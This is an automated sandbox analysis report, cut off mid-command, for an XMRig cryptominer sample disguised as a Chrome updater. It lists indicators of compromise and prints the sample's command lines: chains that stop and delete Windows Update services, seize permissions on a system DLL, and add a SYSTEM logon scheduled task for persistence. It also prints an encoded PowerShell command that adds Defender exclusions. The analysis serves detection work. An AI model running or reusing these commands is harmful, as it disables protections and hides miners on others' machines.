xmrig | 58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895

Analysis

max time kernel
301s
max time network
288s
platform
windows7_x64
resource
win7-20220718-en
resource tags

arch:x64arch:x86image:win7-20220718-enlocale:en-usos:windows7-x64system
submitted
05-08-2022 22:18

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exe
Size

7.1MB
MD5

2144e985a1fb8a18636dee1b1fcf096f
SHA1

fac93e4f151a3be8d9b0b6c9d50a31ba9a3e231a
SHA256

58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895
SHA512

48d3b4b8a95bd4a4bc1405284db373a5acdfe30de15b0641aeef359c06a359dc1344cb8bb1fb63ee35bc38e3eae3fb88eed2128d66d52e9153e1d940be54476c

Score

10^/10

xmrig discovery evasion exploit miner themida trojan

Malware Config

Signatures

Modifies security service 2 TTPs 2 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security	reg.exe

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

Processes:

58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exeupdater.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	updater.exe

XMRig Miner payload 13 IoCs

miner

Processes:

resource	yara_rule
behavioral1/memory/1496-160-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig
behavioral1/memory/1496-162-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig
behavioral1/memory/1496-164-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig
behavioral1/memory/1496-165-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig
behavioral1/memory/1496-167-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig
behavioral1/memory/1496-169-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig
behavioral1/memory/1496-171-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig
behavioral1/memory/1496-172-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig
behavioral1/memory/1496-173-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig
behavioral1/memory/1496-175-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig
behavioral1/memory/1496-177-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig
behavioral1/memory/1496-178-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig
behavioral1/memory/1496-180-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig

Drops file in Drivers directory 2 IoCs

Processes:

conhost.execonhost.exe

description	ioc	process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	conhost.exe
File opened for modification	C:\Windows\system32\drivers\etc\hosts	conhost.exe

Executes dropped EXE 1 IoCs

Processes:

updater.exe

pid process

1712 updater.exe
Possible privilege escalation attempt 4 IoCs
exploit

Processes:

takeown.exeicacls.exetakeown.exeicacls.exe

pid process

1780 takeown.exe
1712 icacls.exe
1900 takeown.exe
1504 icacls.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

pid	process
1712	updater.exe

pid	process
1780	takeown.exe
1712	icacls.exe
1900	takeown.exe
1504	icacls.exe

Checks BIOS information in registry 2 TTPs 4 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exeupdater.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	updater.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	updater.exe

Loads dropped DLL 1 IoCs

Processes:

taskeng.exe

pid process

992 taskeng.exe
Modifies file permissions 1 TTPs 4 IoCs
discovery

File Permissions Modification
T1222

Processes:

icacls.exetakeown.exeicacls.exetakeown.exe

pid process

1504 icacls.exe
1780 takeown.exe
1712 icacls.exe
1900 takeown.exe

pid	process
992	taskeng.exe

pid	process
1504	icacls.exe
1780	takeown.exe
1712	icacls.exe
1900	takeown.exe

Themida packer 9 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
behavioral1/memory/872-54-0x0000000000400000-0x0000000001066000-memory.dmp	themida
behavioral1/memory/872-55-0x0000000000400000-0x0000000001066000-memory.dmp	themida
behavioral1/memory/872-57-0x0000000000400000-0x0000000001066000-memory.dmp	themida
\Program Files\Google\Chrome\updater.exe	themida
C:\Program Files\Google\Chrome\updater.exe	themida
behavioral1/memory/1712-99-0x0000000000400000-0x0000000001066000-memory.dmp	themida
behavioral1/memory/1712-101-0x0000000000400000-0x0000000001066000-memory.dmp	themida
behavioral1/memory/1712-105-0x0000000000400000-0x0000000001066000-memory.dmp	themida
C:\Program Files\Google\Chrome\updater.exe	themida

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

updater.exe58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	updater.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exe

Drops file in System32 directory 2 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exeupdater.exe

pid process

872 58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exe
1712 updater.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

conhost.exe

description pid process target process

PID 1392 set thread context of 1496 1392 conhost.exe explorer.exe

pid	process
872	58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exe
1712	updater.exe

description	pid	process	target process
PID 1392 set thread context of 1496	1392	conhost.exe	explorer.exe

Drops file in Program Files directory 3 IoCs

Processes:

conhost.execonhost.exe

description	ioc	process
File created	C:\Program Files\Google\Chrome\updater.exe	conhost.exe
File opened for modification	C:\Program Files\Google\Chrome\updater.exe	conhost.exe
File created	C:\Program Files\Google\Libs\WR64.sys	conhost.exe

Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid process

2028 sc.exe
1392 sc.exe
1640 sc.exe
780 sc.exe
1048 sc.exe
912 sc.exe
292 sc.exe
628 sc.exe
1068 sc.exe
1588 sc.exe
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

1652 schtasks.exe

pid	process
2028	sc.exe
1392	sc.exe
1640	sc.exe
780	sc.exe
1048	sc.exe
912	sc.exe
292	sc.exe
628	sc.exe
1068	sc.exe
1588	sc.exe

pid	process
1652	schtasks.exe

Modifies data under HKEY_USERS 5 IoCs

Processes:

conhost.exepowershell.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	conhost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	conhost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	conhost.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = f0fba5292aa9d801	powershell.exe

Modifies registry key 1 TTPs 18 IoCs

Modify Registry

T1112

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

pid	process
456	reg.exe
1412	reg.exe
828	reg.exe
2016	reg.exe
1396	reg.exe
1208	reg.exe
2044	reg.exe
1468	reg.exe
692	reg.exe
320	reg.exe
532	reg.exe
2044	reg.exe
1988	reg.exe
780	reg.exe
1540	reg.exe
1684	reg.exe
1744	reg.exe
1060	reg.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.execonhost.exepowershell.execonhost.exeexplorer.exe

pid	process
1380	powershell.exe
628	conhost.exe
1908	powershell.exe
1392	conhost.exe
1496	explorer.exe
1496	explorer.exe
1496	explorer.exe
1496	explorer.exe
1496	explorer.exe
1496	explorer.exe
1496	explorer.exe
1496	explorer.exe
1496	explorer.exe
1496	explorer.exe
1496	explorer.exe
1496	explorer.exe
1496	explorer.exe
1496	explorer.exe
1496	explorer.exe
1496	explorer.exe
1496	explorer.exe
1496	explorer.exe
1496	explorer.exe
1496	explorer.exe
1496	explorer.exe
1496	explorer.exe
1496	explorer.exe
1496	explorer.exe
1496	explorer.exe
1496	explorer.exe
1496	explorer.exe
1496	explorer.exe
1496	explorer.exe
1496	explorer.exe
1496	explorer.exe
1496	explorer.exe
1496	explorer.exe
1496	explorer.exe
1496	explorer.exe
1496	explorer.exe
1496	explorer.exe
1496	explorer.exe
1496	explorer.exe
1496	explorer.exe
1496	explorer.exe
1496	explorer.exe
1496	explorer.exe
1496	explorer.exe
1496	explorer.exe
1496	explorer.exe
1496	explorer.exe
1496	explorer.exe
1496	explorer.exe
1496	explorer.exe
1496	explorer.exe
1496	explorer.exe
1496	explorer.exe
1496	explorer.exe
1496	explorer.exe
1496	explorer.exe
1496	explorer.exe
1496	explorer.exe
1496	explorer.exe
1496	explorer.exe

Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

468

pid	process
468

Suspicious use of AdjustPrivilegeToken 15 IoCs

Processes:

powershell.exepowercfg.exepowercfg.exepowercfg.execonhost.exepowercfg.exetakeown.exepowershell.exepowercfg.exepowercfg.execonhost.exepowercfg.exepowercfg.exetakeown.exeexplorer.exe

description	pid	process
Token: SeDebugPrivilege	1380	powershell.exe
Token: SeShutdownPrivilege	1232	powercfg.exe
Token: SeShutdownPrivilege	1540	powercfg.exe
Token: SeShutdownPrivilege	636	powercfg.exe
Token: SeDebugPrivilege	628	conhost.exe
Token: SeShutdownPrivilege	1168	powercfg.exe
Token: SeTakeOwnershipPrivilege	1900	takeown.exe
Token: SeDebugPrivilege	1908	powershell.exe
Token: SeShutdownPrivilege	1752	powercfg.exe
Token: SeShutdownPrivilege	908	powercfg.exe
Token: SeDebugPrivilege	1392	conhost.exe
Token: SeShutdownPrivilege	1368	powercfg.exe
Token: SeShutdownPrivilege	1504	powercfg.exe
Token: SeTakeOwnershipPrivilege	1780	takeown.exe
Token: SeLockMemoryPrivilege	1496	explorer.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.execonhost.execmd.execmd.exe

description	pid	process	target process
PID 872 wrote to memory of 628	872	58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exe	conhost.exe
PID 872 wrote to memory of 628	872	58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exe	conhost.exe
PID 872 wrote to memory of 628	872	58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exe	conhost.exe
PID 872 wrote to memory of 628	872	58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exe	conhost.exe
PID 628 wrote to memory of 1380	628	conhost.exe	powershell.exe
PID 628 wrote to memory of 1380	628	conhost.exe	powershell.exe
PID 628 wrote to memory of 1380	628	conhost.exe	powershell.exe
PID 628 wrote to memory of 1400	628	conhost.exe	cmd.exe
PID 628 wrote to memory of 1400	628	conhost.exe	cmd.exe
PID 628 wrote to memory of 1400	628	conhost.exe	cmd.exe
PID 628 wrote to memory of 1700	628	conhost.exe	cmd.exe
PID 628 wrote to memory of 1700	628	conhost.exe	cmd.exe
PID 628 wrote to memory of 1700	628	conhost.exe	cmd.exe
PID 1400 wrote to memory of 1392	1400	cmd.exe	sc.exe
PID 1400 wrote to memory of 1392	1400	cmd.exe	sc.exe
PID 1400 wrote to memory of 1392	1400	cmd.exe	sc.exe
PID 1700 wrote to memory of 1232	1700	cmd.exe	powercfg.exe
PID 1700 wrote to memory of 1232	1700	cmd.exe	powercfg.exe
PID 1700 wrote to memory of 1232	1700	cmd.exe	powercfg.exe
PID 1400 wrote to memory of 1640	1400	cmd.exe	sc.exe
PID 1400 wrote to memory of 1640	1400	cmd.exe	sc.exe
PID 1400 wrote to memory of 1640	1400	cmd.exe	sc.exe
PID 1700 wrote to memory of 1540	1700	cmd.exe	powercfg.exe
PID 1700 wrote to memory of 1540	1700	cmd.exe	powercfg.exe
PID 1700 wrote to memory of 1540	1700	cmd.exe	powercfg.exe
PID 1400 wrote to memory of 780	1400	cmd.exe	sc.exe
PID 1400 wrote to memory of 780	1400	cmd.exe	sc.exe
PID 1400 wrote to memory of 780	1400	cmd.exe	sc.exe
PID 1700 wrote to memory of 636	1700	cmd.exe	powercfg.exe
PID 1700 wrote to memory of 636	1700	cmd.exe	powercfg.exe
PID 1700 wrote to memory of 636	1700	cmd.exe	powercfg.exe
PID 1400 wrote to memory of 1048	1400	cmd.exe	sc.exe
PID 1400 wrote to memory of 1048	1400	cmd.exe	sc.exe
PID 1400 wrote to memory of 1048	1400	cmd.exe	sc.exe
PID 1700 wrote to memory of 1168	1700	cmd.exe	powercfg.exe
PID 1700 wrote to memory of 1168	1700	cmd.exe	powercfg.exe
PID 1700 wrote to memory of 1168	1700	cmd.exe	powercfg.exe
PID 1400 wrote to memory of 292	1400	cmd.exe	sc.exe
PID 1400 wrote to memory of 292	1400	cmd.exe	sc.exe
PID 1400 wrote to memory of 292	1400	cmd.exe	sc.exe
PID 1400 wrote to memory of 320	1400	cmd.exe	reg.exe
PID 1400 wrote to memory of 320	1400	cmd.exe	reg.exe
PID 1400 wrote to memory of 320	1400	cmd.exe	reg.exe
PID 1400 wrote to memory of 828	1400	cmd.exe	reg.exe
PID 1400 wrote to memory of 828	1400	cmd.exe	reg.exe
PID 1400 wrote to memory of 828	1400	cmd.exe	reg.exe
PID 1400 wrote to memory of 532	1400	cmd.exe	reg.exe
PID 1400 wrote to memory of 532	1400	cmd.exe	reg.exe
PID 1400 wrote to memory of 532	1400	cmd.exe	reg.exe
PID 1400 wrote to memory of 1208	1400	cmd.exe	reg.exe
PID 1400 wrote to memory of 1208	1400	cmd.exe	reg.exe
PID 1400 wrote to memory of 1208	1400	cmd.exe	reg.exe
PID 1400 wrote to memory of 2016	1400	cmd.exe	reg.exe
PID 1400 wrote to memory of 2016	1400	cmd.exe	reg.exe
PID 1400 wrote to memory of 2016	1400	cmd.exe	reg.exe
PID 1400 wrote to memory of 1900	1400	cmd.exe	takeown.exe
PID 1400 wrote to memory of 1900	1400	cmd.exe	takeown.exe
PID 1400 wrote to memory of 1900	1400	cmd.exe	takeown.exe
PID 1400 wrote to memory of 1504	1400	cmd.exe	icacls.exe
PID 1400 wrote to memory of 1504	1400	cmd.exe	icacls.exe
PID 1400 wrote to memory of 1504	1400	cmd.exe	icacls.exe
PID 628 wrote to memory of 1068	628	conhost.exe	cmd.exe
PID 628 wrote to memory of 1068	628	conhost.exe	cmd.exe
PID 628 wrote to memory of 1068	628	conhost.exe	cmd.exe

C:\Users\Admin\AppData\Local\Temp\58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exe
"C:\Users\Admin\AppData\Local\Temp\58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
PID:872

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exe"
2⤵
- Drops file in Drivers directory
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:628

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHAAYQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAZABqAHoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAdwBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHIAeQAjAD4A"
3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1380

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
3⤵
- Suspicious use of WriteProcessMemory
PID:1400

C:\Windows\system32\sc.exe
sc stop UsoSvc
4⤵
- Launches sc.exe
PID:1392

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
4⤵
- Launches sc.exe
PID:1640

C:\Windows\system32\sc.exe
sc stop wuauserv
4⤵
- Launches sc.exe
PID:780

C:\Windows\system32\sc.exe
sc stop bits
4⤵
- Launches sc.exe
PID:1048

C:\Windows\system32\sc.exe
sc stop dosvc
4⤵
- Launches sc.exe
PID:292

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
4⤵
- Modifies registry key
PID:320

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
4⤵
- Modifies registry key
PID:828

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
4⤵
- Modifies security service
- Modifies registry key
PID:532

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
4⤵
- Modifies registry key
PID:1208

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
4⤵
- Modifies registry key
PID:2016

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1900

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1504

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:1744

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:1060

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:2044

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:456

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
4⤵
PID:304

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
4⤵
PID:1388

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
4⤵
PID:1404

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
4⤵
PID:268

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
4⤵
PID:1428

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
4⤵
PID:1944

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
4⤵
PID:972

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
3⤵
- Suspicious use of WriteProcessMemory
PID:1700

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1232

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1540

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:636

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1168

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Program Files\Google\Chrome\updater.exe\""
3⤵
PID:1068

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Program Files\Google\Chrome\updater.exe\""
4⤵
- Creates scheduled task(s)
PID:1652

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /run /tn "GoogleUpdateTaskMachineQC"
3⤵
PID:1608

C:\Windows\system32\schtasks.exe
schtasks /run /tn "GoogleUpdateTaskMachineQC"
4⤵
PID:872

C:\Windows\system32\taskeng.exe
taskeng.exe {97B9D42D-77A4-430E-8B02-6FA1F34A19B5} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
- Loads dropped DLL
PID:992

C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1712

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Program Files\Google\Chrome\updater.exe"
3⤵
- Drops file in Drivers directory
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1392

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHAAYQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAZABqAHoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAdwBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHIAeQAjAD4A"
4⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1908

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN 